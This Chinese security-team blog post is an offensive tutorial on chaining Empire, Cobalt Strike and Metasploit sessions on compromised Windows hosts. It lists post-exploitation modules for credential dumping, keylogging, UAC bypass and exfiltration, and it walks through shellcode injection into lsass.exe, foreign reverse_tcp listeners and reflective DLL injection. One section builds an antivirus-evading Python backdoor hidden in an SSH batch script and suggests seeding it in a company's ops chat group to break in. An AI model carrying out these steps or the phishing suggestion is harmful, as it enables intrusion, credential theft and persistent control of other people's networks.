内网剑客三结义 - 5ecurity技术团队

5ecurity技术团队

砥砺奋进
不断前行

内网剑客三结义

内网三剑客

  • EmpireCobal strikeMetasploit被称之为APT三剑客,这三款工具被国内外众多黑客团队和APT组织青睐。
  • Metasploit:这个肯定是不用多说了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,居家旅行,杀人越货之必备神器。
    Cobaltstrike:类似于RAT,是一款牛逼的APT协同工作平台。扩展性很强,兼容各种平台,独立的框架,不依赖于其他框架,提供了丰富的第三方接口,可以进行内网渗透,社工钓鱼,木马远控以及你所想要的功能,虽说是商业软件,但是好像大家都可以轻易破解,实际里面暗桩很多,使用者请自行分析。
  • Empire:针对内网渗透的利器,跨平台的特性,类似metasploit的功能,有丰富的模块和接口,可自行添加模块和功能,针对powershell利用的最好平台,没有之一。
  • 渗透过程中,我们会遇到各样的环境,很多情况下,我都需要这三款工具协同工作,今天就给大家分享一下如何并联这三款工具,实现灵活运用。

Empire 关联 Metasploit

我们使用Empire简单生成一个木马,
Empire的框架跟metasploit类型,使用大同小异
查看一下所有的监听模块

dbx
http
http_com
http_foreign
http_hop
http_mapi
meterpreter
onedrive
redirector

image

这里我使用http,监听需要给他设置一个名字 设置号主机和端口 启用监听就可以了
我们再生成一个payload,通过 usestager 命令我们可以查看到有很多模块

multi/bash
osx/ducky
osx/safari_launcher
windows/hta
windows/macroless_msword
multi/launcher
osx/dylib
osx/teensy
windows/launcher_bat
windows/shellcode
multi/macro
osx/jar
windows/backdoorLnkMacro
windows/launcher_lnk
windows/teensy
multi/pyinstaller
osx/launcher
windows/bunny
windows/launcher_sct
multi/war
osx/macho
windows/csharp_exe
windows/launcher_vbs
osx/applescript
osx/macro
windows/dll
windows/launcher_xml
osx/application
osx/pkg
windows/ducky
windows/macro

image

选择自己要生成的模块,关联自己的监听就可以了
这里我生成一个快捷图标木马,他会生成再Empire根目录下,其他的一些payload会生成在tmp/目录下
image

我们将生成的上传至目标主机运行,
image

运行过后,监听器会受到上线提示
image

我们可以使用agents命令查看在线主机
image

主机上线后,我们将目的将其转为meterpreter
Interact 主机ID,选择进入交互
我们通过usemodule 查看 可以使用的后渗透模块相当丰富,这正式Empire亮点的地方
image

code_execution/invoke_dllinjection
persistence/elevated/wmi*
code_execution/invoke_metasploitpayload
persistence/elevated/wmi_updater*
code_execution/invoke_ntsd
persistence/misc/add_netuser
code_execution/invoke_reflectivepeinjection
persistence/misc/add_sid_history*
code_execution/invoke_shellcode
persistence/misc/debugger*
code_execution/invoke_shellcodemsil
persistence/misc/disable_machine_acct_change*
collection/ChromeDump
persistence/misc/get_ssps
collection/FoxDump
persistence/misc/install_ssp*
collection/USBKeylogger*
persistence/misc/memssp*
collection/WebcamRecorder
persistence/misc/skeleton_key*
collection/browser_data
persistence/powerbreach/deaduser
collection/clipboard_monitor
persistence/powerbreach/eventlog*
collection/file_finder
persistence/powerbreach/resolver
collection/find_interesting_file
persistence/userland/backdoor_lnk
collection/get_indexed_item
persistence/userland/registry
collection/get_sql_column_sample_data
persistence/userland/schtasks
collection/get_sql_query
privesc/ask
collection/inveigh
privesc/bypassuac
collection/keylogger
privesc/bypassuac_env
collection/minidump
privesc/bypassuac_eventvwr
collection/netripper
privesc/bypassuac_fodhelper
collection/ninjacopy*
privesc/bypassuac_sdctlbypass
collection/packet_capture*
privesc/bypassuac_tokenmanipulation
collection/prompt
privesc/bypassuac_wscript
collection/screenshot
privesc/getsystem*
collection/vaults/add_keepass_config_trigger
privesc/gpp
collection/vaults/find_keepass_config
privesc/mcafee_sitelist
collection/vaults/get_keepass_config_trigger
privesc/ms16-032
collection/vaults/keethief
privesc/ms16-135
collection/vaults/remove_keepass_config_trigger
privesc/powerup/allchecks
credentials/credential_injection*
privesc/powerup/find_dllhijack
credentials/enum_cred_store
privesc/powerup/service_exe_restore
credentials/invoke_kerberoast
privesc/powerup/service_exe_stager
credentials/mimikatz/cache*
privesc/powerup/service_exe_useradd
credentials/mimikatz/certs*
privesc/powerup/service_stager
credentials/mimikatz/command*
privesc/powerup/service_useradd
credentials/mimikatz/dcsync
privesc/powerup/write_dllhijacker
credentials/mimikatz/dcsync_hashdump
privesc/tater
credentials/mimikatz/extract_tickets
recon/find_fruit
credentials/mimikatz/golden_ticket
recon/get_sql_server_login_default_pw
credentials/mimikatz/keys*
recon/http_login
credentials/mimikatz/logonpasswords*
situational_awareness/host/antivirusproduct
credentials/mimikatz/lsadump*
situational_awareness/host/computerdetails*
credentials/mimikatz/mimitokens*
situational_awareness/host/dnsserver
credentials/mimikatz/pth*
situational_awareness/host/findtrusteddocuments
credentials/mimikatz/purge
situational_awareness/host/get_pathacl
credentials/mimikatz/sam*
situational_awareness/host/get_proxy
credentials/mimikatz/silver_ticket
situational_awareness/host/get_uaclevel
credentials/mimikatz/trust_keys*
situational_awareness/host/monitortcpconnections
credentials/powerdump*
situational_awareness/host/paranoia*
credentials/sessiongopher
situational_awareness/host/winenum
credentials/tokens
situational_awareness/network/arpscan
credentials/vault_credential*
situational_awareness/network/bloodhound
exfiltration/egresscheck
situational_awareness/network/get_exploitable_system
exfiltration/exfil_dropbox
situational_awareness/network/get_spn
exploitation/exploit_eternalblue
situational_awareness/network/get_sql_instance_domain
exploitation/exploit_jboss
situational_awareness/network/get_sql_server_info
exploitation/exploit_jenkins
situational_awareness/network/portscan
lateral_movement/inveigh_relay
situational_awareness/network/powerview/find_foreign_group
lateral_movement/invoke_dcom
situational_awareness/network/powerview/find_foreign_user
lateral_movement/invoke_executemsbuild
situational_awareness/network/powerview/find_gpo_computer_admin
lateral_movement/invoke_psexec
situational_awareness/network/powerview/find_gpo_location
lateral_movement/invoke_psremoting
situational_awareness/network/powerview/find_localadmin_access
lateral_movement/invoke_smbexec
situational_awareness/network/powerview/find_managed_security_group
lateral_movement/invoke_sqloscmd
situational_awareness/network/powerview/get_cached_rdpconnection
lateral_movement/invoke_sshcommand
situational_awareness/network/powerview/get_computer
lateral_movement/invoke_wmi
situational_awareness/network/powerview/get_dfs_share
lateral_movement/invoke_wmi_debugger
situational_awareness/network/powerview/get_domain_controller
lateral_movement/jenkins_script_console
situational_awareness/network/powerview/get_domain_policy
lateral_movement/new_gpo_immediate_task
situational_awareness/network/powerview/get_domain_trust
management/disable_rdp*
situational_awareness/network/powerview/get_fileserver
management/downgrade_account
situational_awareness/network/powerview/get_forest
management/enable_multi_rdp*
situational_awareness/network/powerview/get_forest_domain
management/enable_rdp*
situational_awareness/network/powerview/get_gpo
management/get_domain_sid
situational_awareness/network/powerview/get_group
management/honeyhash*
situational_awareness/network/powerview/get_group_member
management/invoke_script
situational_awareness/network/powerview/get_localgroup
management/lock
situational_awareness/network/powerview/get_loggedon
management/logoff
situational_awareness/network/powerview/get_object_acl
management/mailraider/disable_security
situational_awareness/network/powerview/get_ou
management/mailraider/get_emailitems
situational_awareness/network/powerview/get_rdp_session
management/mailraider/get_subfolders
situational_awareness/network/powerview/get_session
management/mailraider/mail_search
situational_awareness/network/powerview/get_site
management/mailraider/search_gal
situational_awareness/network/powerview/get_subnet
management/mailraider/send_mail
situational_awareness/network/powerview/get_user
management/mailraider/view_email
situational_awareness/network/powerview/map_domain_trust
management/psinject
situational_awareness/network/powerview/process_hunter
management/reflective_inject
situational_awareness/network/powerview/set_ad_object
management/restart
situational_awareness/network/powerview/share_finder
management/runas
situational_awareness/network/powerview/user_hunter
management/shinject
situational_awareness/network/reverse_dns
management/sid_to_user
situational_awareness/network/smbautobrute
management/spawn
situational_awareness/network/smbscanner
management/spawnas
trollsploit/get_schwifty
management/switch_listener
trollsploit/message
management/timestomp
trollsploit/process_killer
management/user_to_sid
trollsploit/rick_ascii
management/vnc
trollsploit/rick_astley
management/wdigest_downgrade*
trollsploit/thunderstruck
management/zipfolder
trollsploit/voicetroll
persistence/elevated/registry*
trollsploit/wallpaper
persistence/elevated/schtasks*
trollsploit/wlmdr

info命令可以查看到主机详情信息
image

这里我们使用Empire自带的

code_execution/invoke_metasploitpayload

模块,这是一个和metasploit的web_delivery交互的模块
所以我们首先在接受会话权限的metasploit配置好

exploit/multi/script/web_delivery

监听
image

image

Execute执行过后
image

Metasploit这边就会接收到上线提示
image

以上这种方法基本也是基于powershell上线
我们还可以很多其他模块,例如

code_execution/invoke_shellcode
code_execution/invoke_shellcode

image

image

同时我们的msf设置好监听器Empire就可以执行了
image

image

image

如果卸载主机会话可以使用kill命令加agnets ID
image

Empire 关联Cobalt strike

当我们拥有了Empire会话,想关联cobalt stike使得团队共享进一步增加战果
首先Cobalt strike创建一个监听器
image

查看在线主机 agents
进入empire 权限会话 :interact 主机NAME
image

image

查看主机信息:info
在取得权限后 我们可以使用Empire后渗透模块
我习惯使用

code_execution/invoke_shellcode

模块,直接注入到进程里
这个模块使用相对简单
进入模块

usemodule code_execution/invoke_shellcode

image

这个模块使用相对简单
image

设置三个参数即可 Cobalt strike 的监听主机 端口 和 模块
Execute执行
image

image

Cobalt strike 马上会受到上线提示
类似这样的模块还有很多我就不一一举例
image

Cobalt strike关联 Empire

当我们们团队共享了一个Cobalt目标给我们,我们想使用Empire丰富的后渗透模块进行进一步深入,如何关联Empire

首先我们使用empire创建一个监听和一个pyload
image

这次我们生成一个bin文件进行shellcode注入
image

我们把payload设置号监听器就会在tmp目录下launcher.bin文件
我们将launcher.bin下载至本机,然后获取主机进程信息
image

进入会话操作以后我们使用PS命令查看进程信息
这里我就选择lsass.exe进程 PID 596进行注入
输入( shinject 注入的进程号 系统架构)
image

会让你选择需要注入的shellcode文件,选择好之后会自动上传进行注入
稍等一会 empire ,就会收到上线提示

image

Cobalt strike关联 Metasploit

当我们团队分享给我一个cobalt strike 权限,我们希望转为msf继续深入
我们可以使用cobalt stike 的spawn功能
Cobalt stike 的外部监听器可以与MSF联动

windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp

这里我使用reverse_tcp
在msf开启监听reverse_tcp
在cobalt strike会话主机上点击spwan
image

选择spwan后创建一个外部监听器,

windows/foreign/reverse_tcp

image

image

稍等一会 msf就会收到session请求
image

接下来我们就可以利用MSF进行一系列的深入渗透

Metasploit 关联 Empire

如果用把meterpreter提升为empire会话,最好是system权限,提前做好getsystem,如果你的权限过低,会有很多功能会失败甚至上线失败
我们思路是使用usestager生成payload让meterpreter载入运行
我们使用msfvenom简单编码生成一个木马
我们先简单生成一个payload
image

上传至目标主机运行
image

接下将这个会话关联至Empire
首先使用 Emprire创建一个监听器,设置监听器名字监听主机和监听端口
image

通常我都会使用dll诸如进程来关联empire,接下里我们使用 windows/dll创建payload
image

image

Dll文件生成在tmp目录下
接下来需要一个进程号实现我们的注入
image

条件齐全后我们

post/windows/manage/reflective_dll_inject

注入dll文件
image

此时Empire已上线
image

image

Metasploit 关联 Cobalt

目标机器WIN7
攻击机kali
首先我们msfvenom使用生成一个 py后门,这样被查杀的几率较小
image

我们将其payload代码复制到一个SSH批量脚本中,模拟钓鱼攻击
image

保存之后运行检测,python模块虽然不被查杀但是权限很低,需要后续的权限提升
image

使用360运行查杀运行到上线没有任何提示
image

假如我们把他丢进某公司运维群里去或者运维论坛,一旦有人运行相当于撕开一个公司的大门,抛砖引玉,思路自行脑补。
接下来我们要做的是把他转换为cobalt strike会话
Session挂起后,我们可以使用MSF的

windows/manage/payload_inject

模块
注入新的进程给cobalt strike
image

首先我们cobalt 开启一个监听器

Windows/beacon_http/reverse_http

image

首先我们cobalt 开启一个监听器

Windows/beacon_http/reverse_http

image

image

稍等一会就会有上线提示
image

总结

阅读完了文章有没有对三款神器感兴趣,文中很多技巧并不一定是最好或是唯一的,只算是抛砖引玉,当然这篇文章有很多不足,暂且作为新手科普文,另外欢迎对APT感兴趣的玩家多多交流。

未经允许不得转载:5ecurity技术团队 » 内网剑客三结义

相关推荐

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址